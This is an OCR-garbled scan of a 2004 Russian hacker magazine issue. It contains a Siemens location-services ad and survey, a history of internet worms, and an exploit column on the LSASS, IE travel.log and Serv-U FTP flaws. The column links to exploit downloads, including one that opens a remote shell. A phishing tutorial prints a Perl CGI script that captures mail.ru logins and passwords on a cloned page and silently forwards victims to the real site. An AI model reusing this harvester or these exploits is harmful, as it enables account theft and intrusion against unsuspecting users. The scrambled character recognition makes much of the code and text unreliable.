т.ігасііоп Ріпсіег & Сііу Оиісіе, приведем несколь- 
ко примеров. 

Предположим, вы ищете место, где можно поу- 
жинать после окончания рабочего дня. Побли- 
зости есть несколько неплохих ресторанов, од- 
нако наверняка во многих из них нет свободных 
мест. Что делать? Проверять каждый? Ріа это уй- 
дет остаток вечера. Однако, выход есть. Одного 
взгляда на услугу поиска ресторанов достаточ- 
но, чтобы принять решение. Сразу же можно и 
зарезервировать столик. 

Еще один пример: бензин в баке почти на нуле, а 
заправок, как назло не попадалось уже давно. 
Вы выбираете услугу поиска заправки, сконфи- 
гурированную таким образом, чтобы система 
искала для вас только заправки определенной 
фирмы (если у вас есть предпочтения в этом 
плане) или осуществляла поиск в зависимости 
цен на бензин (если предпочтений нет). И вот у 
вас на экране точный маршрут до ближайшей 
подходящей именно вам заправки. 

ОСНОВНЫЕ ВОЗМОЖНОСТИ М.ТПАСТЮЫ 
Я7А/ОЕЯ & СІТУ СиЮЕ ВКЛЮЧАЮТ 

• поддержку различных алгоритмов поиска 

• конфигурацию в соответствии с предпочтени- 
ями пользователя 

• поиск ценовых категорий 

• возможность представления изображений на 




любом мобильном телефоне 

• изображение и масштабирование графичес- 
ких цветных карт города 

• поиск улиц и других объектов с показом их на 
карте 

• показ картинок, видео и пояснений, относя- 
щихся к предмету поиска 

• поиск правильного маршрута 

И это еще не все. Ріпсіег & Сііу Оиісіе поддержи- 
вает администрирование через ѴѴАР и ѵѵеб, им- 
порт и экспорт контента а также фирменные руб- 
рики контента. 

В основе технологии лежит разработанная 
Зіетепз тоЬіІе платформа определения место- 
положения, использующая стандартизирован- 
ные элементы, такие как ОМ1_С (шлюзовый мо- 
бильный центр определения местоположения) и 
центр ЗМІ_С (обслуживающий мобильный центр 
определения местоположения). 



5ІЕМЕІЧ5 



Заполни анкету и получи 
потрясающие призы от Зіетепз тоЬіІе! 



Компания Зіетепз тоЬІІе проводит розыгрыш набор призов среди читателей журнала. Для 
того чтобы получить шанс выиграть один из пяти мобильных телефонов Зіетепз или главный 
приз - смартфон Зіетепз 3X1 достаточно просто заполнить эту анкету и выслать ее на ад- 
рес редакции: 103031, Москва, Дмитровский пер., д. 4, стр. 2 , спометкой "Зіетепз тоЫІе" 
или в электронном виде на 8іетепз@аатеІапсІ.ги Конкурс проводится до 30 апреля 

Ответив на предлагаемые вопросы, вы поможете нам правильно оценить перспективы про- 
дуктов и технологий, связанных с определением местоположения в России. 



1 . Знакома ли Вам торговая марка 
Зіетепз тоЬіІе? 

□ Да □ Нет 

2. Какие продукты и решения от Зіетепз 
тоЬіІе известны Вам: 

□ Мобильные телефоны С8М 

□ Беспроводные модули СЗМ 

□ ѴѴБАЫ 

□ Услуги, связанные с определением местоположения 

□ Сетевое оборудование ОЗМ 

□ Беспроводные телефоны Оідазе'І 

3. Какой марки и модели Ваш мобильный 
телефон? 

Укажите 

4. Если Вы пользуетесь автомобилем, то 
укажите марку Вашего автомобиля. 

Марка автомобиля 

5. Есть ли в Вашем автомобиле навигаци- 
онная система. 

□ Да □ Нет 

6. Как вы определяете дорогу до какого- 
либо объекта в незнакомом районе города: 

□ по карте 

□ спрашиваю у других водителей 

□ использую навигационную систему 

7. Хотели бы Вы получать на свой мобиль- 
ный телефон следующую информацию: 

□ реклама 

□ местонахождение ближайшего к Вам интересую- 



щего Вас объекта (автозаправка, аптека, ресторан, 
банкомат и т.п.) 

□ информационные сообщения (о пробках на доро- 
гах, прогноз погоды, новости и т.п.) 

8. Хотели бы Вы пользоваться следующи- 
ми услугами, с использованием Вашего 
мобильного телефона: 

□ слежение за транспортом 

□ слежение за передвижение грузов 

□ охрана объектов 

9. Готовы ли Вы платить за дополнитель- 
ные услуги, связанные с определением 
местоположения? 

□ Да □ Нет 

10. Если ДА, то какую сумму в месяц Вы го- 
товы платить в дополнение к сумме платы 
за ползование мобильной связью? 

□ От 1 до 5 долларов США 

□ От 5 до 1 0 долларов США 

□ От 1 0 до 15 долларов США 

□ Свыше 15 долларов США 

1 1 . Какова, по Вашему мнению, должна 
быть стоимость навигационной системы? 

□ От 50 до 100 долларов США 

□ От 100 до 300 долларов США 

□ От 300 до 700 долларов США 

□ Свыше 700 долларов США 

1 2. Какие другие услуги, связанные с опре- 
делением местоположения, по Вашему 
мнению, могут быть полезны пользовате- 
лям в России (укажите) 

Укажите 
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5ІЕМЕІЧ5 




М304-007 18088.ЕХЕ 
ПЕЙОТЕ 008 ЕХРІОІТ 




Понятное дело, что багов в винде достаточно, но 
на этот раз найденные ошибки оказались особен- 
ными, Потому как к ним возможно обращение че- 
рез НРС. И, естественно, сразу появился 
эксплойт. Скорее, это было обусловлено пред- 
шествующим появлением червя тзЫазІ (в акку- 
рат после выкладывания полноценного эксплой- 
та). Все в нетерпении затаили дыхание и гадали 
- что же будет дальше? А дальше вышел нюк про- 
тив сервиса БЗАЗЗ.ЕХЕ (какое красивое название 
;)). После эксплуатирования жертвы, передается 
кривой пакет, убивающий системную службу. И в 
завершение выползает греющее душу окошко, 
сообщающее о перезагрузке системы. 



защита: 



На тісго50Ісот сливай необходимое добро от Билла 
Гейтса. Тем, кто не может (или не хочет) ставить 
патчи, необходимо закрыть файрволом 445 порт. 



ссыпки: 



Хочешь поприкалываться над локальными 
окошками? ;) Тогда сливай экзешник отсюда: 

іл/ѵѵи.5есигііуІаЬ.ги/_ІооІ$/М$04-007-сІО5.ехе. Только не забывай, 
что все хакерские действия преследуются законом. 
Для профи существует исходник, который можно 
изучитъ на досуге (жиакер.ш/ро$І/21233/ехрІоШ). 
Пострадал сам? Тогда выкачивай специальный патч 
(список заплаток тут: шшкер.ш/ро$І/21189/МаЛа$р). 



злоключение: 



Выход досера для 15АЗЗ.ЕХЕ - это только цветочки. 
Скоро будут и ягодки в виде полноценных эксплой- 
тов и червяков. Как показывает печальный опыт, ха- 
керы не дремлют, а пишут эффективные эксплойты. 



СКЕЕТ8: 



Первый смертельный кед в паблик источники предос- 
тавил Сітгізіоріте Эеипе. Местоположение хакера не 
указывается, поэтому связаться с ним невозможно. 



ШЕВ1ШЕХРЮПЕПШ 

«ШІІП8СВІРТШЕСТКМ 




10 февраля Місгозой выпустила патч, устраняю- 
щий три уязвимости в ослике ІЕ 6.0. Одна из них 
была потенциально опасной, так как позволяла 
выполнять любые локальные команды. Правда, 
под правами текущего пользователя. Суть баги 
следующая: в винде существует файл (гаѵеі.іод, 
куда скидываются все сайты, которые посетил 
юзер. Таким образом, кривой запрос к этому 
файлу (через ДаѵаЗсгірІ:) позволяет создать не 
менее кривой МтІ-документ. Последний и бу- 
дет наглым образом компрометировать систе- 
му, выполняя пакостные команды :). 



защита: 



Зашита единственная - поставить патч. И на вся- 
кий случай, не броди по левым сайтам, а то вмиг 
лишишься своих паролей и всей системы :). 



ССЫПКИ: 



Патч для защиты осла можешь слить с офици- 
ального сайта 

(іш.тісго5оЕІсот/8отІоа85/8гіаіІ$.а$рх?ЕатіІуІ8=ВЕ0С 
18ВС-7Г9А-4196-ВГОЕ-29ЕВА8СГ7А50М$р1ау1апд=ги). 
Эксплойт и краткое описание по применению 
берем здесь: шшесіігіІуІаІ).ги/42666.ІіІіпІ. 



ЗЛОКЛЮЧЕНИЕ: 



Бага довольно просто фиксится, но очень мно- 
гие пользователи забывают ставить патчи. Поэ- 
тому выводы делай сам. От массового падения 
форточек спасает лишь то, что немногие сидят 
под правами администратора... 



СНЕЕТ8: 



Простой скрипт для эксплуатирования был на- 
писан Апсігеаз ЗапбЫасГом, Код благополучно 
создает произвольный файл на десктопе поль- 
зователя. 



8ЕКІІ-Ц ЕТР 8ЕПІІЕН 
ЕХРІОІТ 




В самом популярном РТР-сервере под винду 
была обнаружена ошибка. Переменная- 
название файла имела максимальный размер 
256 байт и не проверялась на переполнение. В 
теории, если грамотно составить шеллкод, то 
сервер может выполнить любые действия под 
правами администратора. Шеллкод передается 
через команду ЗІТЕ СНМСЮ, и именно на это и 
ориентирован эксплойт. 



защита: 



Патчей для ЗЕНѴ-ІІ нет. Единственным спосо- 
бом защиты является переход на свежую вер- 
сию демона (шкегѵ-і.сош). Альтернативный ме- 
тод защиты - запрещение использования 
СНМСЮ. 



ссыпки: 



На самом деле, эксплойтов два. Первый из них 
является досером (после его применения сер- 
вис завершает работу). Второй открывает шелл 
на 53 порту. Ссылки на все версии эксплойтов 
ищи в документе 

$есигі(у.ппоѵ.га/$еагсВ/пеш$р?І)іпі(І=3394. Подробное 
описание ошибки находится здесь: 
$есигі(у.ппоѵ.ш/$еагс1і/(1оситеп1.а$р?сІосі(1=5676. 



злоключение: 



ЗЕНУЮ самый популярный демон в локальных 
сетях. Поэтому, если ты состоишь в такой сетке, 
то у тебя есть реальный шанс порутать с деся- 
ток компов. Правда, существует определенный 
риск получить от администратора по голове :). 



6ПЕЕТ8: 



Эксплойт был написан человеком под ником 
ЗкуУпеб <ЗкуУпеб@ЕсІиР.ТІЮеІП.пІ>. Ему по- 
могал Н Э Мооге (написал шеллкод). Найти этих 
людей можно в ІНС (ОАУЧеІ, #пе(гіс). 




ЧісгоздГі НІІІСІСИІЕ 
I С !' Квдгиюенжй М'.іжигсд 1 ' ■ 

*. Ѵйу сіоі 

1 і*йі~ЯИ7-40* Сілгдоі Ьс 

і; : ѴНу Исгиі’і I «Я* ~НЕІ 7-40* 1 
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ХПКЕР/№03(63)/2004 



И а иой взгпяд, иировая паутина на все 100% отражает реапьную жизнь. И все вопнения из обычной жизни очень быстро перетекают 
в виртуальный иир. Интернет и реальность до такой степени переплетены, что даже болезни и заразы не обошли мир 
виртуальности. Эпидемии вирусов и червей в последнее вреия все чаще и чаще нарушают обычный ритм жизни интернетчиков. 
Другой вопрос, что эти всплески заражений происходят по вине самих же людей, тогда как в обычной жизни, напротив, от человеческого 
разума мало что зависит. В этой статье речь пойдет как раз об одной из разновидностей киберзаразы - червях. 

ПОВЕСТЬ ОБ ИНТЕРНЕТ-ЧЕРВЯХ 
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иѵооои: МЫ ТЕБЯ ВЫЛЕЧИМ 



^откуда они взялись 

нтернет-червь - это програм- 
ма, способная после выпуска 
ее в Сеть существовать авто- 
номно. Т.е. черви живут сами 
по себе, не нуждаясь в том, 
чтобы их запускал человек, 
подвергая тем самым зараже- 
нию свою систему. Черви са- 
ми размножаются, расползаются по интерне- 
ту и делают то, для чего они предназначены, 
используя дыры в программном обеспече- 
нии. В этом и состоит основное отличие чер- 
вей от простых вирусов. Ведь чтобы пустить 
виря в массы, нужно после его написания за- 
разить им какой-нибудь файл, выложить этот 
файл на всеобщее обозрение в Сеть и раск- 
рутить его так, чтобы как можно больше лю- 
дей скачали зараженную программу. С чер- 
вями все намного проще. Достаточно лишь 
один раз его запустить, и червь сам найдет 
себе дорогу во «взрослую жизнь». 

История интернет-червей уходит далеко 
в прошлое, а точнее, в 1988 год. Еще тогда, 

2 ноября, молодой любитель пакостей (руки 
бы пообломать), выпускник Корнельского 
университета Роберт Таппан Моррис, впер- 
вые запустил свою вредоносную программу, 
которая вышла из-под контроля и начала со 
скоростью урагана распространяться по Се- 
ти, заражая собой все новые и новые компь- 
ютеры. Оказавшись на компьютере, червь 
начинал копировать самого себя и рассылать 
свои копии дальше на те машины, которые 
еще не были заражены. Тем самым червячок 
сильно загружал серверы, что вызывало от- 
каз в обслуживании. За короткое время тво- 
рение Бобби Морриса успело обосноваться 
примерно на шести тысячах компьютеров в 
Сети. В результате такой неожиданной атаки 
на интернет многие компании понесли ко- 
лоссальные убытки, общая сумма которых 
оценивалась почти в 99 миллионов мертвых 
президентов. Мир ясно осознал, какую опас- 
ность несет интернет, а сам интернет перес- 
тал чему-либо удивляться. 

С этого момента черви стали появляться 
регулярно, и количество их возрастало с каж- 
дым годом в арифметической прогрессии. 




| Создатель первого червя в мире 



А ПРИНЦИП ДЕЙСТВИЯ 

Каждый интернет-червь, помимо какой-либо 
функции (не обязательно деструктивной), ко- 
торую он должен выполнять, умеет самостоя- 
тельно распространяться по Сети. Зачастую 
хозяева компьютеров долго пребывают в не- 
ведении, что на их машине завелся червячок. 
Вроде ничего из интернета не качали, анти- 
вирус ни о чем не предупреждал, да и вооб- 
ще, все, вроде бы, нормально. А в это время 
ползучий гад постоянно работает, плодясь и 
плодясь втихаря. Совсем не обязательно, что 
червь будет стирать какую-то важную инфор- 
мацию с компьютера, вполне достаточно то- 
го, что он каждые пару минут сканирует Сеть 
на предмет нахождения и заражения в ней 
дырявых машин, тем самым нехило подгру- 
жая систему и канал в интернет. 

Червячки расползаются по всемирной па- 
утине, используя бреши и корявости напи- 
санного программного обеспечения. Часто 
таким программным обеспечением являются 
почтовые службы, такие как аутглюк, бат и 
т.д. К примеру, нашумевший червь со 
скромным названием Анна Курникова расп- 
ространялся через е-таіі рассылку. Попадая 
на компьютер жертвы в виде электронного 
письма, он тут же начинал искать все записи 
из адресной книги почтовой службы Аутлука 
и рассылать по всем найденным адресам са- 
мого себя с приаттаченой фотографией из- 
вестной теннисистки. Стоит ли говорить, 
насколько сильно падала скорость соедине- 





ния с интернетом у людей, чьи компьютеры 
были заражены червем, из-за таких незапла- 
нированных отправок фоток. 

Некоторые же черви размножаются не че- 
рез почту - они находят бреши в системах, 
установленных на компьютерах, сканируя 
большие диапазоны ІР-адресов, и, найдя 
уязвимую цель, проникают внутрь. После 
проникновения на удаленную машину черви 
преспокойно делают свою работу, одновре- 
менно не прекращая поиски новых уязвимых 
компов в Сети. К таким червям относится и 
небезызвестный МзВІазі. Эта зараза исполь- 
зовала брешь (ПРС), присущую всем непро- 
патченным компам под управлением семей- 
ства виндовых (ХР/2000). Червина проникал 
на непропатченные тачки и начинал искать в 
Сети другие неустойчивые системы, однов- 
ременно перезагружая комп жертвы при 
каждом соединении с интернетом. Если у 
человека был доступ в Сеть не через модем, 
а через выделенный канал, то Бласт вырубал 
его от балды, иначе - каждые полминуты. 

Несложно сделать вывод, что чем дольше 
червь находится на свободе, тем выше ско- 
рость его распространения. Скорость разм- 
ножения червя в Сети напрямую зависит от 
того, сколько компьютеров уже заражено. 
Между этими двумя величинами существует 
зависимость, рассчитываемая по формуле 
геометрической прогрессии. 

А К ЧЕШУ ЭТО ПРИВОДИТ 

Последствия действий интернет-червей по- 
рой печальны до безумия и впечатляющи по 
своим масштабам. В результате действий 
отдельных индивидуумов зачастую бывают 
парализованы многие сегменты интернета 
и внутренние сети различных корпораций и 
компаний. Это приводит к простою компью- 
терного времени, что и влечет за собой 
большие материальные убытки. 

Вместе с этим черви уничтожают важную 
информацию, на восстановление которой 
требуется много времени, сил и денег. За 
счет большого количества трафика, затрачи- 
ваемого при работе червя, скорость падает 
в несколько раз и порой работать становится 
просто невыносимо. 

А СПОСОБЫ КОНТРПЦЕПЦИИ 

Т.к. черви обычно гости нежданные, то гото- 
виться к их приходу следует заранее. Если 
сидеть сложа руки, "защитившись" антивиру- 
сом, и думать, что черви не проберутся на 
твой компьютер, то твоя система, скорее все- 
го, загнется где-то эдак со вторника на среду. 

Тот же файрвол, установленный на твоем 
компе и правильно сконфигурированный, 
всегда оповестит тебя о том, что какая-то 
злобная программа назойливо долбится в 
интернет. Так что этим чудом программис- 
тской мысли не стоит пренебрегать. 

Также не мешает хотя бы раз в сутки по- 
сещать интернет-порталы, специализирую- 
щиеся на сетевой безопасности. Там тебя 
заранее уведомят о том, какие найдены баги 
в программном обеспечении, какие новые 
твари выползли на просторы интернета и как 
с ними бороться. Помни о том, что на ресур- 
сах, посвященных интернет-секьюрити, лю- 
ди довольно быстро реагируют на новые ды- 
ры, через которые можно проникнуть на уда- 
ленный терминал, и выкладывают свежие 
патчи, чтобы обезопасить себя, залатав бре- 



л Интернет-черви - 
очень неприятная 
вещь, отнимающая 
у пользователей 
много времени, 
трафика, сил и по- 
рой лишающая 
важной информа- 
ции. Хорошо пре- 
дохраняйся, и 
тогда ты сведешь 
к минимуму веро- 
ятность зараже- 
ния своего компь- 
ютера. 




л Совсем недавно 
черви проползли и 
в 100. Новая зара- 
за, именуемая 
ВІаге, рассылается 
в виде сообщения 
в асе. В этой мес- 
саге находится 
ссылка на сайт, 
после посещения 
которого на компь- 
ютер жертвы зали- 
вается жабовский 
скрипт через дыру 
в Іпіегпеі Ехріогег. 
Затем червь начи- 
нает рассылать се- 
бя по всему кон- 
такт-листу и про- 
писывается в опре- 
деленных ветвях 
реестра. Червь 
также отсылает хо- 
зяину информацию 
о различных акка- 
унтах, например, 
е-доШ. 




л Немалую роль 
в распространении 
интернет-червей 
играет почтовый 
спам. Спам и черви 
тесно взаимосвяза- 
ны между собой, 
как сообщили экс- 
перты из лаборато- 
рии Касперского. 
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ши. Промедление в этом деле может стоить 
тебе потраченных нервов и потери важной 
инфы, если на твой компьютер проберется 
червь или просто какой-нибудь злоумышлен- 
ник. Достаточно вспомнить про эксплойт, 
вышедший уже на следующий день после 
обнаружения серьезной баги в Місгозой 
А5М.1 ШЬгагу в виндах 2000/ХР и эксплуати- 
рующий ее. Как ты думаешь, многие успели 
пропатчиться за сутки? Да практически весь 
интернет еще можно поиметь через эту ды- 
ру, и это не громкие слова, а сухая констата- 
ция фактов. Шанс, что в ближайшее время 
появится новый червь, эксплуатирующий ба- 
гу в А5Ы.1 , очень велик, так что всплеска 
эпидемии свежего червя можно уверенно 
ожидать уже на днях, а все потому, что боль- 
шинство людей не могут заранее подгото- 
виться к отражению атаки из интернета. 

Безусловно, не стоит сбрасывать со сче- 
тов такой вид защиты, как антивирус. К со- 
жалению, при защите от червей, так же как 
и с патчами, необходимо быть максимально 
оперативным и регулярно обновлять базу 
антивируса. Через пару дней (а то и часов) 
после обнаружения очередного ползучего га- 
да в Сети, антивирусные базы будут уже по- 
полнены и готовы дать отпор новому врагу. 

А ХИТ-ППРПД ЧЕРВЕЙ 

Да нет, не будет здесь никакого хит-парада, 
я просто хочу привести в качестве наглядно- 
го примера некоторых особей этих ползучих 
гадов. В свое время они наделали немало 
шума в кругах интернетчиков. 

І-ѴѴогш.КІег - этот червь использовал 
брешь в браузере Іпіегпег Ехріогег и умел 
распространяться по электронной почте. 
Также червь заражал вирусом расшаренные 
ресурсы в Сети. В результате действий чер- 
вя зараженный компьютер начинал очень 
сильно тормозить. Клез, плюс ко всему, ин- 
фицировал файл ехріогег.ехе, создавал в 
расшаренных папках диска левые файлы 
размером 10 Кб и с двойным расширением. 
Чтобы не подхватить эту заразу и не допус- 
тить ее автозапуск на компьютере, требова- 
лось всего-то пропатчить браузер. 

Следующий нашумевший червь, Меіізза, 
рассылался в электронных сообщениях с 
приаттаченными зараженными файлами 
Місгозой ѴѴогсІ 97 или 2000. Попав на новый 
компьютер, червь начинал рассылать себя 
по первым 50 адресам из записной книжки 
почтового клиента ОиІІоок. Мелисса очень 
быстро распространилась по всему миру. 
Многие компании несли большие убытки от 
действий этого червя. 



МНЕНИЕ ЭКСПЕРТП 



П ервая копия червя МуЭоот была обнаружена около часа но- 
чи с 26 на 27 января. В течение часа уровень потенциальной 
угрозы был определен как критический. Все антивирусные ком- 
пании сразу же выпустили обновления своих продуктов для де- 
тектирования нового червя. Эпидемия продолжала стремитель- 
но распространяться по всему миру, и к 6 часам утра, проанали- 
зировав почтовый трафик, мы пришли к выводу, что это будет 
самая крупная вирусная эпидемия в истории сети интернет. 

Эпидемия продолжается и по сей день. Несмотря на то, что пос- 
ле 12 февраля МуЭоот перестал рассылать себя по почте, он 
все еще функционирует на тех компьютерах, где неправильно 
установлена дата. До сих пор к нам на электронную почту ежед- 
невно приходит до 300 писем, зараженных этим червем. Прос- 
мотрев текст самих писем, можно заметить, что дата отсылки - 
1997, 1998 или 2000 гг. То есть можно говорить о том, что из-за 
неправильной даты на некоторых компьютерах червь продолжа- 
ет распространяться, хотя уже и не в таких масштабах. 

На сегодняшний день убытки по причине вредоносных 
действий червя МуЭоот уже составили порядка 30 миллиардов 
долларов, что дает полное право назвать этого червя самым 
вредоносным за всю историю существования сети интернет. 
Также в скором времени следует ожидать новой эпидемии ви- 
русов и червей, которая, вероятнее всего, произойдет в связи с 
утечкой исходных кодов ѴѴІпсІоѵѵз и использованием недокумен- 
тированных функций ядра операционной системы. 

К сожалению, вычислить авторов червей и вирусов в настоящий 
момент довольно проблематично, но уже сейчас созданы орга- 
ны по борьбе с киберпреступностью. Наглядным примером яв- 
ляется арест 19-летней девушки, более известной в Сети под 
ником ОідаЬуІе, которая с 14 лет занимается вирусописатель- 
ством. На ее счету создание нескольких известных червей и ви- 
русов, в том числе есть подозрения, что авторство червя, вы- 
шедшего на просторы интернета в августе прошлого года 
(ЗоЬід.І), также принадлежит ей. Случаи задержания киберп- 
реступников на сегодняшний день единичны, но мир прекрасно 
осознает, какую угрозу этот вид деятельности представляет для 
интернета в целом, поэтому в ближайшем будущем следует 
ожидать ужесточения законов, относящихся к деятельности 
в Сети, и дальнейшего развития органов киберправопорядка. 



Александр Гостев, вирусный аналитик "Лаборатории Кас- 
перского" 
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Известный червь I І_оѵе Ѵои, о котором 
трубили в новостях по всем каналам телеви- 
дения, тоже наделал в Сети немало шума. 
Червячина приходил в письме со знакомым 
для адресата отправителем. Поле зибіесі 
всегда содержало фразу И.0ѴЕѴ011, а в са- 
мом тексте письма было предложение отк- 
рыть письменное признание в любви. При 
его открытии запускался скрипт, написанный 
на ѴізиаІ Вазіс, который и активировал чер- 
вя. После активации червь прописывался в 
автозапуск системы и начинал рассылать се- 
бя по всем адресам в записной книге почто- 
вика ОиІІоок. Кроме того, АйЛавЮ выискивал 
файлы с расширениями ,і$ и .сзз и затирал 
их, вставляя свой скрипт с таким же назва- 
нием. Помимо этих действий, червь-любов- 
ник затирал еще огромное количество фай- 
лов с различными расширениями. 

Л ИѴ000Н- ГЕРОЙ НПШЕГО 
ВРЕМЕНИ 

На сегодняшний день волны распростране- 
ния новых червей стали все чаще и чаще 
тревожить интернет. Черви расползаются по 
Сети, причиняя огромный ущерб всей паути- 
не в целом. Совсем недавно вышел на сво- 
боду червяк, который окрестили не иначе, 
как МуРоот, он же КІоѵагд. Червь начал 
стремительно распространяться в конце 
февраля через электронную почту в прик- 
репленных к письму файлах с расширениями 
.ехе, .зсг, .гір или .ріі. Заголовок письма с 
червем содержал слова Тезі или Зіаіиз. Как 
стало известно позже, Новарг записывал 
произвольный код в биос зараженного 
компьютера, и вытащить его оттуда можно 
только перепрошивкой флеши. 

Уже за первый час эпидемии компании, 
занимающиеся производством антивирусных 
программ, получили около 40 сообщений о 
распространяющейся инфекции! 

Задачей МуРоот (имеются в виду обе вер- 
сии - А и В) являлась массированная ОРоЗ- 
атака на два крупных сервера корпораций-ги- 
гантов: Місгозой и ЗСО. 1 февраля с пора- 
женных компьютеров началась отсылка зап- 
росов на эти веб-серверы. Но корпорации 




были заранее подготовлены и оповещены о 
предстоящей атаке и успели принять меры и 
свести ущерб от нападения к минимуму. К то- 
му же, атака оказалась слабее, чем ожидали, 
из-за того, что в коде червя программистом 
была допущена ошибка, и не все зараженные 
компьютеры приняли участие в РРоЗ'е. 

Также Новарг "извинялся" за причиненный 
вред. В коде программы были обнаружены 
комментарии человека, скорее всего, проверя- 
ющего код на ошибки, в которых говорилось о 
том, что он не виноват, он просто делает свою 
работу. «Извините, ничего личного». 

За информацию об авторе, написавшем 
МуРоот, компания ЗСО предложила 250 ты- 
сяч зеленых. Впоследствии эта сумма удвои- 
лась, благодаря аналогичному предложению 
от мелкомягких. Но даже за такие бабки ник- 



то не настучал на злобного программера. 
Наверное, никто и не знал его реального 
местонахождения. Сам же автор, скорее все- 
го, предполагал, какие убытки понесут мно- 
гие корпорации в Сети, и особо не трепался 
о своей крутости. 

В коде этого червя была заложена функ- 
ция самоуничтожения после 12 февраля. 

Червь Новарг наделал много шума по все- 
му миру. О нем говорили не только на спе- 
циализированных интернет-ресурсах, но и 
постоянно упоминали по телевидению, ра- 
дио и даже в газетах. 

Мы тоже не могли оставить без внимания 
этого червя, поэтому решили посетить Лабо- 
раторию Касперского и выслушать мнение 
экспертов в области защиты компьютеров от 
заразы в интернете. Читай об этом на врезке. 




Л итого 

Все программные методы защиты подобны 
презервативу. Они, конечно, на каком-то 
уровне защитят твой компьютер от проник- 
новения на него разных нежелательных тва- 
рей, но стопроцентной защиты не гарантиру- 
ют. Антивирус не всегда успеет оперативно 
алертнуть на какую-нибудь гадость, пытаю- 
щуюся проникнуть в твою систему. Казалось 
бы, еще полчаса назад ты обновлял базу 
своего АѴР, а в непонятном письме по почте 
к тебе уже просочился новый червь. Поэтому 
десять раз подумай, прежде чем открывать 
приаттаченные файлы в подозрительном 
письме. Сеть очень похожа на реальную 
жизнь, в ней так же стоит многого опасаться 
и постоянно держать ухо востро. Думаю, 
прочитав статью, ты это уже понял. 





Заспамленные МуРоот’ом ящики 
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ы никогда не дуиап, как хакеры могут выдирать пароли от почтовых ящиков? Как они получают к ним доступ? Задумывался пи ты о 
том, что хакеры могут выманить пароль у тебя самого, и при этом ты даже не заметишь, что что-то произошло? Нет? П такое вполне 
вероятно. Не веришь - читай дальше. 



ШЕР/№03(63)/2004 
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ТВОИ 




Ч3*> 

л На нашем диске 
лежат все описан- 
ные скрипты и 
НТМЬформы. 



^ИЕХОНИЗИОВТОРИЗНЦИИ 

НПМНІШ 

П редставь себе следующую 
ситуацию. Ты пользуешься 
бесплатной почтовой служ- 
бой шаіі.ги и знаешь, что о 
безопасности твоего таіі- 
Ьох’а позаботятся грамот- 
ные админы этого сервиса. 
На всякий пожарный ты ни- 
когда нигде не сохраняешь пароль, чтобы 
случайный взломщик, захаксоривший твою 
тачку (не дай Бог, конечно), оказался в 
обломе. И вот однажды ты получаешь 
письмо от службы поддержки с просьбой 
пройти повторную авторизацию. Ничего не 
подозревая, ты в очередной раз логи- 
нишься на таіі.ги и через некоторое время 
замечаешь, что твоей почтой кто-то рулит: 
читает твои письма и пишет всякие гадос- 
ти от твоего имени. Как же такое могло 
произойти? Ведь ты поставил восьмисим- 
вольный пароль ’І87$*#2Г! 

Итак, рассмотрим действия хакера, с по- 
мощью которых он сможет получить акцес к 
твоей почте. Сначала он заходит на таіі.ги и 
сохраняет главную страницу к себе на хард. 
Потом регает где-нибудь сайт, заливает све- 
жескачанную страницу себе на сервер. 
Представим, что взломщик порегал сайт 
Шр://таіІги.п$(І.™. Теперь его пага - это копия 
таіі.ги. Если залогиниться на этой странице, 



то логин с паролем перешлются на таіі.ги, 
а мы попадем в свой почтовый ящик. 




Давай посмотрим, как же выглядит сама 
форма авторизации в виде ітіті: 




<іпри( 5І2е="14" Іуре="ра55ѵѵог(і" пате-'РаяшІ" ѵаІие=""> 
«іприі ТУРЕ=$иЬтіІ пате- 111 ѵаІие="Войтм"> 

</(огт> 

Мы видим, что данные, которые юзер 
введет в форму, отправляются методом 
РОЗТ скрипту Шр://ѵуіп.таіІ.ги/сді-Ьіп/аиііі. А что 
произойдет, если он вдруг подставит туда 
СІРД своего скрипта? Например, что-нибудь 
вроде Шр://таіІш.п$(І.ги/сді-Ьіп/аиіІісді? Ясень 
пень, тогда логин и пароль перешлются не 
на таіі.ги, а уже прямо скрипту хакера! Чу- 
ешь, чем это пахнет? 

Рассмотрим этот самый скрипт аиііт.сді, 
которым воспользуется хакер для успешного 
приема логина и пароля от пользователя. 

Как он работает. Скрипт получает необхо- 
димые данные, сохраняет их в отдельный 
файл, а потом посылает юзера с его логи- 
ном и паролем на настоящий сценарий авто- 
ризации (МІр:/Міп.паіІ.ги/сді-Ып/аиІР). В итоге, 
пользователь, ничего не замечая, успешно 
попадает в свой почтовый ящик. Но фишка в 
том, что логин с паролем останутся у хакера! 
А вот сам исходник скрипта: 
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в записываем туда логин и пароль от ящика 
ргіпі Е06 "ЗЕОЩЕодііт'} Ф ЗРОКМСНотаіп'}, 
раззЗЕОВД'РаззѵктІ'іѴГ; 
в закрываем файл 
сіозе ЮО; 

# все, пароль сперт! 

в теперь перекидываем на ліаіі.ги: 
ргіпі "Сопіепі-Туре: ІехІ/ІіІтІ\п\п"; 
ргіпі "<НТМ1><ВООѴ>\п"; 

# создаем ту же форму, что и на настоящем таіі.гн 
ргіпі "<1огпі лате=\"Аи11і\" теІІіосІ=ро5І 
асІіоп=(і11р^/иіп.таіІ.ги/сді-Ьіп/аи11і>\п"; 

ргіпі "<іпри1 (уре=1тМеп паліе=Мрорі ѵаіие=1892134183>\п"; 

ргіпі "<іпри1 1уре=Иеп пате=іодіп_1гот ѵаІііе=ІІІііІ>\п"; 

ргіпі "<іпри1 1уре=Меп пате=\"іеѵеі\" ѵаіие=1>\п"; 

ргіпі "<іпри1 1уре=1шИеп лате=\"1одіп\" 

ѵаІие=\"$Р0КМ{'1одіп , }\">\п"; 

ргіпі "<іпри1 1уре=Иеп пате=\"Раз5М(І\" 

ѵаІие=\"$Р0КМ{'Ра$5иог(1 , }\">\п"; 

ргіпі "<іпри1 1уре=Иеп паліе=\"Оогпаіп\" 

ѵаІие=\"$РОКМ{'Оотаіп'}\">\п"; 

ргіпі "<іпри1 ТѴРЕ=Ш(Іеп пате=\"\" ѵаіие=\"Войти\">\п"; 

# без участия пользователя жмем на невидимую кнопку зоб- 
тіі =) 

ргіпі "<зсгір( Іапдоаде=іаѵазсгірІ>АиІб.зибтіІ()</зсгірі>\п"; 
ргіпі "<Догт>\п"; 
ргіпі "</В(ШѴ></НТМІ>\п"; 

Собственно, вот и весь скрипт сетевого 
подонка. Теперь хакер запивает его в диру 
сді-Ьіп, не забывая при этом поставить соот- 
ветствующий сігтосі (755). Далее он меняет 
на своей странице экшен формы: строку 
<Еогт пате="Аи11і" теі1юб=розі 
асЕіоп=бЕІр://ѵѵіп.таіІ.ги/сді-Ьіп/аиІІі> на 
<Еогт пате="Аи№" теІіюсі=ро5І 
ас(іоп=ИИр://таіІги.пзсІ.ги/сді-Ьіп/аиІИ.сді>, 
